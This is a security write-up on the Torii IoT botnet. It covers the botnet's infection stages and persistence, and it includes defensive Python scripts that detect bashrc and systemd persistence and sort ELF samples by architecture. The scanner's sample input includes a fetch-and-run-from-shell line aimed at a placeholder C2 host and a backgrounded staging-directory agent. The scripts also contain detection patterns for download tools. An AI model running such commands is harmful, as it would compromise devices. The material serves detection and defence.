
Torii Botnet

Posted: September 28, 2018

The Torii Botnet is an Internet-of-Things-based network of Trojans that includes comprehensive anti-analysis, persistence, and backdoor features, which the threat actor may exploit for dropping other threats, collecting information, or running threatening system commands. Variants of the Torii Botnet's components are compatible with a great range of devices and OS environments, which have been under attack since at least late 2017. Affected users should reset their IoT devices to factory conditions immediately to remove the Torii Botnet and close the associated security vulnerabilities.

The Botnet that Starts from Tor and Goes Everywhere

Courtesy of independent Bulgarian security research, samples of a potentially ten-month-old botnet are coming under thorough investigation, with the threat actors responding, in turn, by improving their anti-analysis features. While the Torii Botnet, like Mirai, the Death Botnet, and Prowli, uses a decentralized means of committing crimes by infecting IoT devices opportunistically, its payload is unusual for both its sophistication and its apparent goals. The Torii Botnet, instead of running a simple Bitcoin-mining operation, creates broad, flexible backdoor security holes that its admins could use for various attacks.

Malware researchers are confirming the Torii Botnet's division into four general phases, regardless of the nature of the Internet-of-Things device in question:

  • Attacks drop a corrupted script on the device after brute-forcing the login credentials (such as accounts using easy-to-guess strings like 'password1' or 'admin123'). This script, like the rest of the Torii Botnet's components, supports an extensive range of environments and identifies the device's environment before dropping another threat via HTTP or FTP.
  • The next stage is a Trojan dropper, more specialized than the first script, that also serves the purpose of downloading another Trojan: this time, a backdoor-capable one. It also makes the backdoor Trojan system-persistent through not just one or two, but a total of six distinct methods, such as bashrc injection and systemd services.
  • The backdoor Trojan, besides including some anti-analysis features that its authors update regularly, also transfers system information to an outside server, can use multiple means of downloading and running other files, and maintains a constant loop of contact with any Command & Control infrastructure. It can accept and run shell commands and cause substantial system changes, such as deleting files.
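
The persistence step above is where a defender has the best chance of spotting an infection on a device that still offers a shell. The following audit script is an added example and is not code from the original write-up or from the Torii samples themselves: it scans a shell startup file and a set of systemd unit bodies for the two persistence methods the text names (bashrc injection and systemd services), using generic heuristics rather than any Torii-specific indicator. The staging directories, trusted path prefixes, sample .bashrc content and sample unit files are all constructed assumptions for the demonstration.

```python
import re
from typing import Dict, List

# Heuristics, not Torii-specific indicators (assumption): directories a
# dropper typically stages payloads in, and shell idioms that have no
# business in a login script or a service definition.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
BACKGROUND_RUN = re.compile(r"\bnohup\b|&\s*$")
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/opt/", "/etc/")


def scan_shell_line(line: str) -> List[str]:
    """Return the reasons, if any, that one shell line looks like injected persistence."""
    stripped = line.strip()
    reasons: List[str] = []
    if not stripped or stripped.startswith("#"):
        return reasons
    if any(d in stripped for d in STAGING_DIRS):
        reasons.append("runs from a staging directory")
    if DOWNLOAD_TOOLS.search(stripped):
        reasons.append("downloads at shell start")
    if PIPE_TO_SHELL.search(stripped):
        reasons.append("pipes into a shell")
    if BACKGROUND_RUN.search(stripped):
        reasons.append("backgrounded")
    return reasons


def find_bashrc_injections(content: str) -> List[Dict[str, object]]:
    """Scan the body of a .bashrc/.profile line by line and report hits."""
    findings = []
    for number, line in enumerate(content.splitlines(), 1):
        reasons = scan_shell_line(line)
        if reasons:
            findings.append({"line": number, "text": line.strip(), "reasons": reasons})
    return findings


def find_suspicious_units(units: Dict[str, str]) -> List[Dict[str, object]]:
    """Flag systemd units whose ExecStart binary lives outside trusted prefixes
    or whose command line trips the shell-line heuristics."""
    findings = []
    for name, body in units.items():
        exec_start = ""
        for line in body.splitlines():
            if line.strip().startswith("ExecStart="):
                exec_start = line.strip().split("=", 1)[1].strip()
        if not exec_start:
            continue
        # systemd allows prefixes such as '-' or '@' before the binary path
        parts = exec_start.lstrip("-@!:+").split()
        binary = parts[0] if parts else ""
        reasons = scan_shell_line(exec_start)
        if not binary.startswith(TRUSTED_PREFIXES):
            reasons.insert(0, "binary outside trusted prefixes")
        if reasons:
            findings.append({"unit": name, "exec_start": exec_start, "reasons": reasons})
    return findings


# Constructed sample inputs (not recovered from any real device).
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
export PATH=$PATH:$HOME/bin
alias ll='ls -alF'
nohup /tmp/.x/agent >/dev/null 2>&1 &
wget -q http://c2.invalid/s.sh -O - | sh
"""

SAMPLE_UNITS = {
    "ssh.service": "[Unit]\nDescription=OpenBSD Secure Shell server\n"
                   "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "sysupdate.service": "[Unit]\nDescription=system update\n"
                         "[Service]\nExecStart=/var/tmp/.sys/update -d\nRestart=always\n",
}

if __name__ == "__main__":
    for hit in find_bashrc_injections(SAMPLE_BASHRC):
        print("bashrc line %d: %s  <- %s" % (hit["line"], hit["text"], ", ".join(hit["reasons"])))
    for hit in find_suspicious_units(SAMPLE_UNITS):
        print("unit %s: %s  <- %s" % (hit["unit"], hit["exec_start"], ", ".join(hit["reasons"])))
```

On a real device the same functions would be fed the contents of each user's rc files and of every unit under the systemd search paths; the heuristics are deliberately loose so that a factory-reset decision can be confirmed by a human rather than made by the script.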

Malware experts' further inspections of the contents of some Torii Botnet servers also reveal a possible modular component, 'sm_packed_agent.' This Go-based Trojan can run virtually any device-appropriate command and is compatible with an incredible range of environments, including personal computer-based ones, such as most versions of Windows and Linux. Its intended purpose alongside the other components requires additional investigation.

Keeping Your Devices Out of an Internet-of-Trojans

Most IoT-compromising campaigns make money by exploiting random devices' hardware to mine cryptocurrency, or support other crimes by providing cover through simulated network traffic, such as in a Distributed-Denial-of-Service attack. The Torii Botnet is very dissimilar to threats like Mirai in its apparent goals and shows numerous signs of programming experience and sophistication on the part of the threat actor, who is likely a single person responsible for most of the components of the Trojan network. Although the emphasis is on the risk to Internet-of-Things products, some parts of the Torii Botnet, such as its sm_packed_agent, could run on laptops, desktops or tablets with few or no modifications.

Different threats within the Torii Botnet are compatible with everything from MIPS architectures to PPC and SH, including 32-bit and 64-bit builds and both byte orders. Its environmental requirements are flexible, and its symptoms, other than potentially flagged network traffic, are inconsequential to casual observers. Victims should consult their device manufacturer's recommendations for resetting the IoT device to factory standards, removing the Torii Botnet in the process. Should this threat compromise a standard PC, most anti-malware products should intercept and delete the Torii Botnet's dropper during the early stages.
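
When a dropper like the one described here is recovered together with its architecture-specific payloads, the first triage question is which of those builds matches the compromised device. The script below is an added example, not code from the write-up or from the Torii samples: it decodes the class, byte order, object type and machine field from the ELF header so that a directory of recovered binaries can be sorted by target architecture before any are loaded into an analysis tool. The sample corpus is constructed in the code from synthetic 20-byte headers; the file names, the `make_sample` helper and the subset of machine values are assumptions for the demonstration.

```python
import struct
from typing import Dict

# Subset of e_machine values from the ELF specification, chosen to cover the
# architectures named in the write-up plus common PC targets (assumption).
EM_NAMES = {
    3: "x86", 8: "MIPS", 20: "PowerPC", 21: "PowerPC64",
    40: "ARM", 42: "SuperH", 62: "x86-64", 183: "AArch64",
}
E_TYPES = {1: "REL", 2: "EXEC", 3: "DYN"}


def parse_elf_header(data: bytes) -> Dict[str, object]:
    """Decode class, byte order, object type and machine from an ELF header.

    Only the first 20 bytes are needed: e_ident (16 bytes) followed by the
    16-bit e_type and e_machine fields, which are read in the byte order the
    header itself declares.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("malformed e_ident: class=%d data=%d" % (ei_class, ei_data))
    fmt = ("<" if ei_data == 1 else ">") + "HH"
    e_type, e_machine = struct.unpack(fmt, data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": E_TYPES.get(e_type, "unknown(%d)" % e_type),
        "machine": EM_NAMES.get(e_machine, "unknown(%d)" % e_machine),
    }


def describe(data: bytes) -> str:
    """One-line summary such as 'MIPS 32-bit big-endian EXEC'."""
    h = parse_elf_header(data)
    return "%s %d-bit %s-endian %s" % (h["machine"], h["bits"], h["endian"], h["type"])


def make_sample(bits: int, little: bool, machine: int) -> bytes:
    """Build a constructed 20-byte ELF header for the demo (not a real sample)."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if little else 2, 1]) + b"\x00" * 9
    return ident + struct.pack(("<" if little else ">") + "HH", 2, machine)


# Constructed corpus standing in for a directory of recovered binaries.
SAMPLES = {
    "agent.mips": make_sample(32, False, 8),
    "agent.mipsel": make_sample(32, True, 8),
    "agent.ppc": make_sample(32, False, 20),
    "agent.sh4": make_sample(32, True, 42),
    "agent.arm64": make_sample(64, True, 183),
    "agent.x86_64": make_sample(64, True, 62),
    "readme.txt": b"not an ELF file at all",
}


def triage(samples: Dict[str, bytes]) -> Dict[str, str]:
    """Map each file name to its architecture summary, or to the parse error."""
    report = {}
    for name, data in samples.items():
        try:
            report[name] = describe(data)
        except ValueError as exc:
            report[name] = "skipped: %s" % exc
    return report


if __name__ == "__main__":
    for name, summary in triage(SAMPLES).items():
        print("%-14s %s" % (name, summary))
```

Reading the byte order from `e_ident` before unpacking the machine field is the detail that matters for a multi-architecture corpus like this one: a MIPS big-endian build and its little-endian sibling carry the same machine number, and decoding both with a fixed byte order would misidentify one of them.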

What, exactly, the Torii Botnet's author is after is still a question that many researchers in the cyber-security field must be asking themselves. However, with months of regular updates under the campaign's belt, it's clear that whatever it is, he must be getting it, thanks to the weak account security of his victims.
